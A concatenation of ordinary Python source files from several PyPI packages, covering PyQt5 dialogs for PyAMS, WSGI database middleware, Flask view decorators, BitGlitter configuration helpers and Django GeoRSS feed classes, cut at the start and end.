<html><head/><body><p align="center"><br/><span style=" font-family:'monospace'; font-size:10pt; font-weight:600; color:#000000;">PyAMS Pre-alpha 0.0.4</span></p><p align="center"><span style=" font-family:'monospace'; font-size:10pt; font-weight:600; color:#000000;">Python for Analog and Mixed Signals</span></p><p align="center"><a href="http://www.pyams.org"><span style=" font-size:12pt; text-decoration: underline; color:#0000ff;">www.pyams.org</span></a></p><p align="center"><span style=" font-family:'monospace'; font-size:10pt; font-weight:600; color:#000000;">(c) 2021-2022</span></p><p align="center"><span style=" font-size:10pt;"><br/></span></p></body></html>
'''));
#-------------------------------------------------------------------------------
# class about: about dialog.
#-------------------------------------------------------------------------------
class about:
def __init__(self):
self.w = QtWidgets.QDialog()
self.path='';
self.pathLib='';
self.ui = Ui_about()
self.ui.setupUi(self.w)
def show(self):
self.w.show()
#-------------------------------------------------------------------------------
# class Ui_DialogListSignalsParamaters: intrface of dialog List of Signals
# &Paramaters.
#-------------------------------------------------------------------------------
class Ui_DialogListSignalsParamaters(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(449, 510)
self.verticalLayout_2 = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.treeView = QtWidgets.QTreeView(Dialog)
self.treeView.setObjectName("treeView")
self.verticalLayout.addWidget(self.treeView)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.verticalLayout.addWidget(self.buttonBox)
self.verticalLayout_2.addLayout(self.verticalLayout)
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
def getImage(value):
if value['type']=='paramater':
return ":image/paramsignals/param.png"
elif (value['type']=='signal')and (value['description']=='voltage')and (value['dir']=='out'):
return ":image/paramsignals/vout.png"
elif (value['type']=='signal')and (value['description']=='voltage')and (value['dir']=='in'):
return ":image/paramsignals/vin.png"
elif (value['type']=='signal')and (value['dir']=='out'):
return ":image/paramsignals/iout.png"
elif (value['type']=='signal')and (value['dir']=='in'):
return ":image/paramsignals/iin.png"
elif (value['type']=='wire'):
return ":image/paramsignals/node.png"
#-------------------------------------------------------------------------------
# class dialogListSignalsParamaters: dialog List of Signals
# & Paramaters.
#-------------------------------------------------------------------------------
class dialogListSignalsParamaters:
def __init__(self,data):
self.w = QtWidgets.QDialog()
self.path='';
self.pathLib='';
self.ui = Ui_DialogListSignalsParamaters()
self.ui.setupUi(self.w)
self.model = QtGui.QStandardItemModel()
self.model.setHorizontalHeaderLabels(['Name'])#, 'Type', 'Description'
# self.model.resizeSection(0, 42);
self.ui.treeView.setModel(self.model)
self.ui.treeView.header().resizeSection(0, 150);#setStyleSheet("QTreeView::item { width: 100px }")
self.ui.treeView.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.ui.treeView.clicked.connect(self.treeClicked)
self.importData(data)
self.ui.treeView.expandAll()
self.pos='None'
self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(False);
def treeClicked(self, index):
row=index.row()
column=index.column()
data=index.data()
if len(data.split('.'))>1:
self.pos=data
self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(True);
else:
self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(False);
def importData(self, data, root=None):
self.model.setRowCount(0)
if root is None:
root = self.model.invisibleRootItem()
seen = {} # List of QStandardItem
values = deque(data)
while values:
value = values.popleft()
if value['unique_id'] == 1:
parent = root
else:
pid = value['parent_id']
if pid not in seen:
values.append(value)
continue
parent = seen[pid]
unique_id = value['unique_id']
parent.appendRow([
QtGui.QStandardItem(QtGui.QIcon(getImage(value)),value['short_name'])
# QStandardItem(value['type']),
# QStandardItem(value['description'])
])
seen[unique_id] = parent.child(parent.rowCount() - 1)
#seen[unique_id].QStandardItem(QIcon("4.bmp"))
def show(self):
self.w.show()
from PyQt5.QtCore import QUrl
from PyQt5.QtWidgets import QMainWindow, QApplication
from PyQt5.QtWebEngineWidgets import QWebEngineView
#-------------------------------------------------------------------------------
# Open Page web
#-------------------------------------------------------------------------------
from PyQt5.QtCore import QUrl
from PyQt5.QtWebEngineWidgets import QWebEngineView
class openWebPage(QMainWindow):
def __init__(self, *args, **kwargs):
super(openWebPage, self).__init__(*args, **kwargs)
self.browser = QWebEngineView()
def exec(self,var):
self.browser.setUrl(QUrl(var))
self.setCentralWidget(self.browser)
self.show()
class openWebPageDialog:
def __init__(self,url):
self.w = QtWidgets.QDialog()
self.w.resize(611, 647)
self.browser = QWebEngineView(self.w)
self.browser.setUrl(QUrl(url))
self.layout = QtWidgets.QVBoxLayout()
self.layout.addWidget(self.browser)
#self.layout.addWidget(self.buttonBox)
self.w.setLayout(self.layout)
#-------------------------------------------------------------------------------
# __main__: test Dialog
#-------------------------------------------------------------------------------
if __name__ == "__main__":
import sys
app = QApplication(sys.argv)
window = openWebPage()
var="https://pyams.org";
window.exec(var)
app.exec_() | PypiClean |
/CleverHarold-0.1.tar.gz/CleverHarold-0.1/harold/database/middleware.py |
# Copyright 2006 The Incorporated Wizzo Widget Works
# Distributed under the terms of the GNU General Public License v2
# Author: Troy Melhase <[email protected]>
from harold.lib import keys, import_wrapper
from harold.log import logger
try:
import sqlalchemy.mods.threadlocal
import sqlalchemy
import sqlalchemy.ext.activemapper as activemapper
import sqlalchemy.ext.sessioncontext as sessioncontext
except (ImportError, ):
sqlalchemy = None
try:
import sqlobject
except (ImportError, ):
sqlobject = None
class DataProvider(object):
""" Base class for database middleware
Subclasses must implement:
- connect(environ)
- disconnect(environ, exception=None)
@param app contained WSGI application
@param dsn data source name
@param models sequence of model modules
@param dbapi optional module object or string
@param debug flag for debug settings
"""
def __init__(self, app, dsn, models, module=None, debug=True):
self.app = app
self.dsn = dsn
self.models = models
if isinstance(module, basestring):
module = import_wrapper(module)
self.module = module
self.debug = debug
self.log = logger(self)
def __call__(self, environ, start_response):
try:
self.connect(environ)
self.log.debug('connected')
except (Exception, ), ex:
self.log.error('exception connecting', exc_info=ex)
raise
try:
results = self.app(environ, start_response)
except (Exception, ), ex:
self.log.error('application exception', exc_info=ex)
try:
self.disconnect(environ, ex)
except (Exception, ), exc:
self.log.error('exception disconnecting', exc_info=exc)
raise
try:
self.disconnect(environ)
self.log.debug('disconnected')
except (Exception, ), exc:
self.log.error('exception disconnecting', exc_info=exc)
return results
def connect(self, environ):
raise NotImplementedError
def disconnect(self, environ, exception=None):
raise NotImplementedError
def __str__(self):
return '<%s @ %s>' % (self.__class__.__name__, self.dsn, )
class SQLAlchemyProvider(DataProvider):
""" SQLAlchemy data provider
This type assumes that SQLAlchemy has been imported and an metadata
instance of some kind has been made ready for connection.
"""
def __init__(self, *args, **kwds):
if sqlalchemy is None:
raise RuntimeError('SQLAlchemy referenced but not installed')
super(SQLAlchemyProvider, self).__init__(*args, **kwds)
self.engine = sqlalchemy.create_engine(self.dsn)
for model in self.models:
try:
md = getattr(model, '__metadata__', getattr(model, 'metadata'))
except (AttributeError, ):
pass
else:
md.connect(self.engine)
def connect(self, environ):
""" connects to database and stores connection in environment
This method currently sucks because (1) we're not connecting
the tables because that doesn't work, and (2) we're not
estabilishing any session or transaction for the request.
@param environ WSGI request environment
@return None
"""
session = environ[keys.data_session] = \
sqlalchemy.create_session(self.engine)
for model in self.models:
try:
os = model.objectstore
except (AttributeError, ):
pass
else:
os.context.current = session
def disconnect(self, environ, exception=None):
""" commits pending changes and closes connection
@param environ WSGI request environment
@return None
"""
session = environ[keys.data_session]
if exception:
session.close()
return
try:
session.flush()
except (Exception, ), ex:
self.log.error('exception during session flush', exc_info=ex)
try:
session.clear()
except (Exception, ), ex:
msg = 'second exception during session clear'
self.log.error(msg, exc_info=ex)
else:
self.log.error('session cleared after exception')
try:
session.close()
except (Exception, ), ex:
self.log.error('exception during session close', exc_info=ex)
else:
self.log.info('session closed')
class ActiveMapperProvider(SQLAlchemyProvider):
""" ActiveMapper data provider
"""
def __init__(self, *args, **kwds):
if sqlalchemy is None:
raise RuntimeError('ActiveMapper referenced but SQLAlchemy not installed')
super(ActiveMapperProvider, self).__init__(*args, **kwds)
self.engine = sqlalchemy.create_engine(self.dsn)
def connect(self, environ):
""" connects to database and stores connection in environment
"""
activemapper.objectstore.context.current = \
environ[keys.data_session] = \
sqlalchemy.create_session(self.engine)
class SQLObjectProvider(DataProvider):
""" not implemented
"""
def __init__(self, *args, **kwds):
if sqlobject is None:
raise RuntimeError('SQLObject referenced but not installed')
super(SQLObjectProvider, self).__init__(*args, **kwds)
#self.conn = sqlobject.dbconnection.ConnectionHub()
def connect(self, environ):
""" connects to database and stores connection in environment
"""
if self.debug:
print '%s opening %s' % (self, environ['PATH_INFO'], )
environ[keys.data_connection] = \
sqlobject.sqlhub.processConnection = \
sqlobject.connectionForURI(self.dsn)
def disconnect(self, environ, exception=None):
""" commits pending changes and closes connection
@param environ WSGI request environment
@return None
"""
class DBAPIProvider(DataProvider):
"""
"""
def connect(self, environ):
""" connects to database and stores connection in environment
@param environ WSGI request environment
@return None
"""
dsn = self.dsn
if isinstance(dsn, dict):
con = self.module.connect(**dsn)
else:
con = self.module.connect(dsn)
environ[keys.data_connection] = con
def disconnect(self, environ, exception=None):
""" commits pending changes and closes connection
@param environ WSGI request environment
@return None
"""
con = environ[keys.data_connection]
if exception:
con.rollback()
else:
con.commit()
con.close()
def __str__(self):
args = (self.__class__.__name__, self.module.__name__,
self.dsn, abs(id(self)))
return '<%s (%s @ %s) at 0x%x>' % args | PypiClean |
/Harambe-0.10.0.tar.gz/Harambe-0.10.0/harambe/decorators.py | import functools
import inspect
import copy
from flask import Response, jsonify, request, current_app, url_for, make_response, g
from werkzeug.wrappers import BaseResponse
from jinja2 import Markup
from dicttoxml import dicttoxml
from .core import (Harambe,
init_app,
apply_function_to_members,
build_endpoint_route_name)
from . import ext
from . import utils
import blinker
import flask_cors
import json
import sys
# ------------------------------------------------------------------------------
# Some alias, to keep decorators together
cache = ext.cache.cached
memoize = ext.cache.memoize
exempt_csrf = ext.csrf.exempt
# ------------------------------------------------------------------------------
def route(rule=None, **kwargs):
"""
This decorator defines custom route for both class and methods in the view.
It behaves the same way as Flask's @app.route
on class:
It takes the following args
- rule: the root route of the endpoint
- decorators: a list of decorators to run on each method
on methods:
along with the rule, it takes kwargs
- endpoint
- defaults
- ...
:param rule:
:param kwargs:
:return:
"""
_restricted_keys = ["route", "decorators"]
def decorator(f):
if inspect.isclass(f):
kwargs.setdefault("route", rule)
kwargs["decorators"] = kwargs.get("decorators", []) + f.decorators
setattr(f, "_route_extends__", kwargs)
setattr(f, "base_route", kwargs.get("route"))
setattr(f, "decorators", kwargs.get("decorators", []))
else:
if not rule:
raise ValueError("'rule' is missing in @route ")
for k in _restricted_keys:
if k in kwargs:
del kwargs[k]
Harambe._bind_route_rule_cache(f, rule=rule, **kwargs)
return f
return decorator
def _accept_method(methods, f):
kw = {
"append_method": True,
"methods": methods
}
Harambe._bind_route_rule_cache(f, rule=None, **kw)
return f
def accept_get(f):
""" Accept GET method """
return _accept_method(["GET"], f)
def accept_post(f):
""" Accept POST method """
return _accept_method(["POST"], f)
def accept_post_get(f):
""" Accept POST & GET method """
return _accept_method(["POST", "GET"], f)
def accept_delete(f):
""" Accept DELETE method """
return _accept_method(["DELETE"], f)
def accept_options(f):
""" Accept OPTIONS method """
return _accept_method(["OPTIONS"], f)
def accept_put(f):
""" Accept PUT method """
return _accept_method(["PUT"], f)
def template(page=None, layout=None, markup="jade", **kwargs):
"""
Decorator to change the view template and layout.
It works on both Harambe class and view methods
on class
only $layout and markup are applied, everything else will be passed to the kwargs
Using as first argument, it will be the layout.
:first arg or $layout: The layout to use for that view
:param layout: The layout to use for that view
:param markup: the markup to use, by default it's html, can switch to jade.
this will attach it to template_markup
:param kwargs:
get pass to the TEMPLATE_CONTEXT
** on method that return a dict
page or layout are optional
:param page: The html page
:param layout: The layout to use for that view
:param kwargs:
get pass to the view as k/V
** on other methods that return other type, it doesn't apply
:return:
"""
pkey = "_template_extends__"
def decorator(f):
if inspect.isclass(f):
layout_ = layout or page
extends = kwargs.pop("extends", None)
if extends and hasattr(extends, pkey):
items = getattr(extends, pkey).items()
if "layout" in items:
layout_ = items.pop("layout")
for k, v in items:
kwargs.setdefault(k, v)
if not layout_:
layout_ = "layout.html"
kwargs.setdefault("brand_name", "")
kwargs["layout"] = layout_
setattr(f, pkey, kwargs)
setattr(f, "base_layout", kwargs.get("layout"))
setattr(f, "template_markup", markup or "html")
f.g(TEMPLATE_CONTEXT=kwargs)
return f
else:
@functools.wraps(f)
def wrap(*args2, **kwargs2):
response = f(*args2, **kwargs2)
if isinstance(response, dict) or response is None:
response = response or {}
if page:
response.setdefault("_template", page)
if layout:
response.setdefault("_layout", layout)
for k, v in kwargs.items():
response.setdefault(k, v)
return response
return wrap
return decorator
# ------------------------------------------------------------------------------
def _normalize_response_tuple(tuple_):
"""
Helper function to normalize view return values .
It always returns (dict, status, headers). Missing values will be None.
For example in such cases when tuple_ is
(dict, status), (dict, headers), (dict, status, headers),
(dict, headers, status)
It assumes what status is int, so this construction will not work:
(dict, None, headers) - it doesn't make sense because you just use
(dict, headers) if you want to skip status.
"""
v = tuple_ + (None,) * (3 - len(tuple_))
return v if isinstance(v[1], int) else (v[0], v[2], v[1])
__view_parsers = set()
def view_parser(f):
"""
A simple decorator to to parse the data that will be rendered
:param func:
:return:
"""
__view_parsers.add(f)
return f
def _build_response(data, renderer=None):
"""
Build a response using the renderer from the data
:return:
"""
if isinstance(data, Response) or isinstance(data, BaseResponse):
return data
if not renderer:
raise AttributeError(" Renderer is required")
if isinstance(data, dict) or data is None:
data = {} if data is None else data
for _ in __view_parsers:
data = _(data)
return renderer(data), 200
elif isinstance(data, tuple):
data, status, headers = _normalize_response_tuple(data)
for _ in __view_parsers:
data = _(data)
return renderer(data or {}), status, headers
return data
json_renderer = lambda i, data: _build_response(data, jsonify)
xml_renderer = lambda i, data: _build_response(data, dicttoxml)
def render_json(func):
"""
Decorator to render as JSON
:param func:
:return:
"""
if inspect.isclass(func):
apply_function_to_members(func, render_json)
return func
else:
@functools.wraps(func)
def decorated_view(*args, **kwargs):
data = func(*args, **kwargs)
return _build_response(data, jsonify)
return decorated_view
def render_xml(func):
"""
Decorator to render as XML
:param func:
:return:
"""
if inspect.isclass(func):
apply_function_to_members(func, render_xml)
return func
else:
@functools.wraps(func)
def decorated_view(*args, **kwargs):
data = func(*args, **kwargs)
return _build_response(data, dicttoxml)
return decorated_view
def render_jsonp(func):
"""Wraps JSONified output for JSONP requests.
http://flask.pocoo.org/snippets/79/
"""
@functools.wraps(func)
def decorated_view(*args, **kwargs):
callback = request.args.get('callback', None)
if callback:
data = str(func(*args, **kwargs))
content = str(callback) + '(' + data + ')'
mimetype = 'application/javascript'
return current_app.response_class(content, mimetype=mimetype)
else:
return func(*args, **kwargs)
return decorated_view
# ------------------------------------------------------------------------------
class SiteNavigation(object):
"""
SiteNavigation is class decorator to build page menu while building the enpoints
Decorator to build navigation menu directly on the methods
By default it will build the menu of the module, class an method
If the class is also decorated, it will use the menu _name as the top level _name
:param title: str or function : The menu title
if string, it will just display the text
if function, it will run it each time
:param kwargs: extra options to pass into the menu or to move the menu somewhere else
order int: The order of the menu in the set
visible (list of bool or callback): To hide and show menu. Accepts bool or
list of callback function the callback function must return
a bool to check if all everything is True to show or will be False
** When this menu is inside of a menu set, or has parent, if you want
that page to be activated, but don't want to create a menu link,
for example: a blog read page, set show to False. It will know
the menu set is active
endpoint string: By default the endpoint is built based on the method and class.
When set it will be used instead
endpoint_kwargs dict: dict of k/v data for enpoint
group_name str: On class menu, it can be used to filter a menu set to display.
If a class is passed, it will try to inherit the group from that class
The args below will allow you to change where the menu is placed.
By default they are set automatically
module_: the module _name. Usually if using another module
class_: the class _name class _name in the module
method_: The method _name, to build endpoint. Changing this will change the url
some other kwargs:
url
target
fa_icon
align_right
show_profile_avatar
show_profile_name
css_class
css_id
position: string - of right or left. By default it's left
it will position the the menu to the specified place
attach_to: list - of full module.Class path to attach the menu to.
by default it will detach the class it is attached to
To reattach it, add the string `self` in the list
:return:
"""
_title_map = {}
def __call__(self, title, **kwargs):
def wrap(f):
if title:
_class = inspect.stack()[1][3]
_is_class = inspect.isclass(f)
kwargs.setdefault("key", _class)
self._push(title=title,
view=f,
class_name=_class,
is_class=_is_class,
**kwargs)
return f
return wrap
def __init__(self):
self.MENU = {}
def add(self, title, obj, **kwargs):
"""
Add a title
:param title: str: The title of the menu
:param obj: class or method
:param kwargs:
:return:
"""
is_class = inspect.isclass(obj)
self._push(title=title,
view=obj,
class_name=obj.im_class.__name__ if not is_class else obj.__name__,
is_class=is_class,
**kwargs)
def clear(self):
self.MENU = {}
def _push(self, title, view, class_name, is_class, **kwargs):
""" Push nav data stack """
module_name = view.__module__
method_name = view.__name__
_endpoint = build_endpoint_route_name(view, "index" if is_class else method_name, class_name)
endpoint = kwargs.pop("endpoint", _endpoint)
kwargs.setdefault("endpoint_kwargs", {})
order = kwargs.pop("order", 0)
# visible: accepts a bool or list of callback to execute
visible = kwargs.pop("visible", [True])
if not isinstance(visible, list):
visible = [visible]
kwargs["view"] = view
kwargs["visible"] = visible
kwargs["active"] = False
kwargs["key"] = class_name
if is_class: # class menu
kwargs["endpoint"] = endpoint
kwargs["group_name"] = kwargs.pop("group_name", None)
kwargs["has_subnav"] = True
else:
kwargs["has_subnav"] = False
kwargs.update({
"order": order,
"has_subnav": False,
"title": title,
"endpoint": endpoint,
})
self._title_map[endpoint] = title
path = "%s.%s" % (module_name, method_name if is_class else class_name)
attach_to = kwargs.pop("attach_to", [])
if attach_to:
if "self" in attach_to:
attach_to.append(path)
else:
attach_to.append(path)
for path in attach_to:
if path not in self.MENU:
self.MENU[path] = {
"title": None,
"endpoint": None,
"endpoint_kwargs": {},
"order": None,
"subnav": [],
"kwargs": {}
}
if is_class: # class menu
self.MENU[path]["title"] = title
self.MENU[path]["order"] = order
self.MENU[path]["kwargs"] = kwargs
else: # sub menu
self.MENU[path]["subnav"].append(kwargs)
def _get_title(self, title):
"""Title can also be a function"""
return title() if hasattr(title, '__call__') else title
def _test_visibility(self, shows):
if isinstance(shows, bool):
return shows
elif not isinstance(shows, list):
shows = [shows]
return all([x() if hasattr(x, "__call__") else x for x in shows])
def get(self, cls):
key = self.get_key(cls)
return self.MENU[key]
def get_key(self, cls):
"""
Return the string key of the class
:param cls: class
:return: str
"""
return "%s.%s" % (cls.__module__, cls.__name__)
def render(self):
""" Render the menu into a sorted by order multi dict """
menu_list = []
menu_index = 0
for _, menu in copy.deepcopy(self.MENU).items():
subnav = []
menu["kwargs"]["_id"] = str(menu_index)
menu["kwargs"]["active"] = False
if "visible" in menu["kwargs"]:
menu["kwargs"]["visible"] = self._test_visibility(menu["kwargs"]["visible"])
for s in menu["subnav"]:
if s["title"]:
s["title"] = self._get_title(s["title"])
if s["endpoint"] == request.endpoint:
s["active"] = True
menu["kwargs"]["active"] = True
s["visible"] = self._test_visibility(s["visible"])
menu_index += 1
s["_id"] = str(menu_index)
subnav.append(s)
_kwargs = menu["kwargs"]
if menu["title"]:
_kwargs.update({
"subnav": self._sort(subnav),
"order": menu["order"],
"title": self._get_title(menu["title"])
})
menu_list.append(_kwargs)
else:
menu_list += subnav
menu_index += 1
return self._sort(menu_list)
def _sort(self, items):
""" Reorder the nav by key order """
return sorted(items, key=lambda s: s["order"])
def init_app(self, app):
def link_for(endpoint, props={}, **kwargs):
url = url_for(endpoint, **kwargs)
title = self._title_map.get(endpoint, "")
props = " ".join(["%s='%s'" % (k, v) for k, v in props.items()])
a = "<a href='{url}' {props}>{title}</a>".format(title=title,
url=url,
props=props)
return Markup(a)
@app.context_processor
def _():
return dict(link_for=link_for)
@app.before_request
def p(*args, **kwargs):
""" Will always run the menu """
if request.endpoint not in ["static", None]:
setattr(g, "__SITENAV__", nav_title.render())
nav_title = SiteNavigation()
init_app(nav_title.init_app)
# ------------------------------------------------------------------------------
def cors(*args, **kwargs):
"""
A wrapper around flask-cors cross_origin, to also act on classes
**An extra note about cors, a response must be available before the
cors is applied. Dynamic return is applied after the fact, so use the
decorators, render_json, render_xml, or return self.render() for txt/html
ie:
@cors()
class Index(Harambe):
def index(self):
return self.render()
@render_json
def json(self):
return {}
class Index2(Harambe):
def index(self):
return self.render()
@cors()
@render_json
def json(self):
return {}
:return:
"""
def decorator(fn):
cors_fn = flask_cors.cross_origin(automatic_options=False, *args, **kwargs)
if inspect.isclass(fn):
apply_function_to_members(fn, cors_fn)
else:
return cors_fn(fn)
return fn
return decorator
def headers(params={}):
"""This decorator adds the headers passed in to the response
http://flask.pocoo.org/snippets/100/
"""
def decorator(f):
if inspect.isclass(f):
h = headers(params)
apply_function_to_members(f, h)
return f
@functools.wraps(f)
def decorated_function(*args, **kwargs):
resp = make_response(f(*args, **kwargs))
h = resp.headers
for header, value in params.items():
h[header] = value
return resp
return decorated_function
return decorator
def noindex(f):
"""This decorator passes X-Robots-Tag: noindex
http://flask.pocoo.org/snippets/100/
"""
return headers({'X-Robots-Tag': 'noindex'})(f)
# ------------------------------------------------------------------------------
"""
Signals
Signals allow you to connect to a function and re
Usage
1. Emitter.
Decorate your function with @emit_signal.
That function itself will turn into a decorator that you can use to
receivers to be dispatched pre and post execution of the function
@emit_signal()
def login(*a, **kw):
# Run the function
return
@emit_signal()
def logout(your_fn_args)
# run function
return
2. Receivers.
The function that was emitted now become signal decorator to use on function
that will dispatch pre and post action. The pre and post function will
be executed before and after the signal function runs respectively.
@login.pre.connect
def my_pre_login(*a, **kw):
# *a, **kw are the same arguments passed to the function
print("This will run before the signal is executed")
@login.post.connect
def my_post_login(sender, emitter, result, **kw):
# sender: the name of the funciton
# emitter
# result: the result of the function
# **kw
print("This will run after the signal is executed")
3. Send Signal
Now sending a signal is a matter of running the function.
ie:
login(username, password)
That's it!
"""
__signals_namespace = blinker.Namespace()
def emit_signal(sender=None, namespace=None):
"""
@emit_signal
A decorator to mark a method or function as a signal emitter
:param sender: string to be the sender.
If empty, it will use the function __module__+__fn_name,
or method __module__+__class_name__+__fn_name__
:param namespace: The namespace. If None, it will use the global namespace
:return:
"""
if not namespace:
namespace = __signals_namespace
def decorator(fn):
fname = sender
if not fname:
fnargs = inspect.getargspec(fn).args
fname = fn.__module__
if 'self' in fnargs or 'cls' in fnargs:
caller = inspect.currentframe().f_back
fname += "_" + caller.f_code.co_name
fname += "__" + fn.__name__
fn.pre = namespace.signal('pre_%s' % fname)
fn.post = namespace.signal('post_%s' % fname)
def send(action, *a, **kw):
sig_name = "%s_%s" % (action, fname)
result = kw.pop("result", None)
kw.update(inspect.getcallargs(fn, *a, **kw))
sendkw = {k: v for k, v in kw.items() if k in kw.keys()}
sendkw["emitter"] = sendkw.pop('self', sendkw.pop('cls', kw.get('self', kw.get('cls', fn))))
if action == 'post':
sendkw["result"] = result
namespace.signal(sig_name).send(fname, **sendkw)
@functools.wraps(fn)
def wrapper(*args, **kwargs):
send('pre', *args, **kwargs)
result = fn(*args, **kwargs)
kwargs["result"] = result
send('post', *args, **kwargs)
return result
return wrapper
return decorator | PypiClean |
/BitGlitter-2.0.0.tar.gz/BitGlitter-2.0.0/bitglitter/config/configfunctions.py | from bitglitter.config.config import session
from bitglitter.config.configmodels import Config, Constants, Statistics
from bitglitter.config.defaultdbdata import load_default_db_data
from bitglitter.config.palettemodels import Palette
from bitglitter.config.presetmodels import Preset
from bitglitter.config.readmodels.streamread import StreamRead
from bitglitter.config.readmodels.readmodels import StreamDataProgress, StreamFile, StreamFrame, StreamSHA256Blacklist
def remove_session():
"""Resets persistent data to factory default settings."""
model_list = [Config, Constants, Palette, Preset, Statistics, StreamDataProgress, StreamFile, StreamFrame,
StreamRead, StreamSHA256Blacklist]
for model in model_list:
session.query(model).delete()
session.commit()
load_default_db_data()
def return_settings():
config = session.query(Config).first()
return {'read_path': config.read_path, 'read_bad_frame_strikes':
config.read_bad_frame_strikes, 'disable_bad_frame_strikes': config.enable_bad_frame_strikes, 'write_path':
config.write_path, 'log_txt_path': config.log_txt_dir, 'log_output': config.log_output,
'maximum_cpu_cores': config.maximum_cpu_cores, 'save_statistics': config.save_statistics,
'output_stream_title': config.output_stream_title, 'MAX_SUPPORTED_CPU_CORES':
config.MAX_SUPPORTED_CPU_CORES, 'logging_level': config.logging_level}
def update_settings(read_path=None, read_bad_frame_strikes=None, disable_bad_frame_strikes=None,
write_path=None, log_txt_path=None, log_output=None, logging_level=None, maximum_cpu_cores=None,
save_statistics=None, output_stream_title=None):
config = session.query(Config).first()
if read_path:
config.read_path = read_path
if read_bad_frame_strikes:
config.read_bad_frame_strikes = read_bad_frame_strikes
if disable_bad_frame_strikes:
config.disable_bad_frame_strikes = disable_bad_frame_strikes
if write_path:
config.write_path = write_path
if log_txt_path:
config.log_txt_dir = log_txt_path
if log_output:
config.log_output = log_output
if config.logging_level:
config.logging_level = logging_level
if maximum_cpu_cores:
config.maximum_cpu_cores = maximum_cpu_cores
if save_statistics:
config.save_statistics = save_statistics
if output_stream_title:
config.output_stream_title = output_stream_title
config.save()
def output_stats():
"""Returns a dictionary object containing read and write statistics."""
stats = session.query(Statistics).first()
return stats.return_stats()
def clear_stats():
"""Resets all write and read values back to zero."""
stats = session.query(Statistics).first()
stats.clear_stats()
def write_stats_update(blocks, frames, data):
"""Internal function to update stats after rendering completes, along with read update below."""
stats = session.query(Statistics).first()
stats.write_update(blocks, frames, data)
def read_stats_update(blocks, frames, data):
stats = session.query(Statistics).first()
stats.read_update(blocks, frames, data) | PypiClean |
/Django-4.2.4.tar.gz/Django-4.2.4/django/contrib/gis/feeds.py | from django.contrib.syndication.views import Feed as BaseFeed
from django.utils.feedgenerator import Atom1Feed, Rss201rev2Feed
class GeoFeedMixin:
"""
This mixin provides the necessary routines for SyndicationFeed subclasses
to produce simple GeoRSS or W3C Geo elements.
"""
def georss_coords(self, coords):
"""
In GeoRSS coordinate pairs are ordered by lat/lon and separated by
a single white space. Given a tuple of coordinates, return a string
GeoRSS representation.
"""
return " ".join("%f %f" % (coord[1], coord[0]) for coord in coords)
def add_georss_point(self, handler, coords, w3c_geo=False):
"""
Adds a GeoRSS point with the given coords using the given handler.
Handles the differences between simple GeoRSS and the more popular
W3C Geo specification.
"""
if w3c_geo:
lon, lat = coords[:2]
handler.addQuickElement("geo:lat", "%f" % lat)
handler.addQuickElement("geo:lon", "%f" % lon)
else:
handler.addQuickElement("georss:point", self.georss_coords((coords,)))
def add_georss_element(self, handler, item, w3c_geo=False):
"""Add a GeoRSS XML element using the given item and handler."""
# Getting the Geometry object.
geom = item.get("geometry")
if geom is not None:
if isinstance(geom, (list, tuple)):
# Special case if a tuple/list was passed in. The tuple may be
# a point or a box
box_coords = None
if isinstance(geom[0], (list, tuple)):
# Box: ( (X0, Y0), (X1, Y1) )
if len(geom) == 2:
box_coords = geom
else:
raise ValueError("Only should be two sets of coordinates.")
else:
if len(geom) == 2:
# Point: (X, Y)
self.add_georss_point(handler, geom, w3c_geo=w3c_geo)
elif len(geom) == 4:
# Box: (X0, Y0, X1, Y1)
box_coords = (geom[:2], geom[2:])
else:
raise ValueError("Only should be 2 or 4 numeric elements.")
# If a GeoRSS box was given via tuple.
if box_coords is not None:
if w3c_geo:
raise ValueError(
"Cannot use simple GeoRSS box in W3C Geo feeds."
)
handler.addQuickElement(
"georss:box", self.georss_coords(box_coords)
)
else:
# Getting the lowercase geometry type.
gtype = str(geom.geom_type).lower()
if gtype == "point":
self.add_georss_point(handler, geom.coords, w3c_geo=w3c_geo)
else:
if w3c_geo:
raise ValueError("W3C Geo only supports Point geometries.")
# For formatting consistent w/the GeoRSS simple standard:
# http://georss.org/1.0#simple
if gtype in ("linestring", "linearring"):
handler.addQuickElement(
"georss:line", self.georss_coords(geom.coords)
)
elif gtype in ("polygon",):
# Only support the exterior ring.
handler.addQuickElement(
"georss:polygon", self.georss_coords(geom[0].coords)
)
else:
raise ValueError(
'Geometry type "%s" not supported.' % geom.geom_type
)
# ### SyndicationFeed subclasses ###
class GeoRSSFeed(Rss201rev2Feed, GeoFeedMixin):
def rss_attributes(self):
attrs = super().rss_attributes()
attrs["xmlns:georss"] = "http://www.georss.org/georss"
return attrs
def add_item_elements(self, handler, item):
super().add_item_elements(handler, item)
self.add_georss_element(handler, item)
def add_root_elements(self, handler):
super().add_root_elements(handler)
self.add_georss_element(handler, self.feed)
class GeoAtom1Feed(Atom1Feed, GeoFeedMixin):
def root_attributes(self):
attrs = super().root_attributes()
attrs["xmlns:georss"] = "http://www.georss.org/georss"
return attrs
def add_item_elements(self, handler, item):
super().add_item_elements(handler, item)
self.add_georss_element(handler, item)
def add_root_elements(self, handler):
super().add_root_elements(handler)
self.add_georss_element(handler, self.feed)
class W3CGeoFeed(Rss201rev2Feed, GeoFeedMixin):
def rss_attributes(self):
attrs = super().rss_attributes()
attrs["xmlns:geo"] = "http://www.w3.org/2003/01/geo/wgs84_pos#"
return attrs
def add_item_elements(self, handler, item):
super().add_item_elements(handler, item)
self.add_georss_element(handler, item, w3c_geo=True)
def add_root_elements(self, handler):
super().add_root_elements(handler)
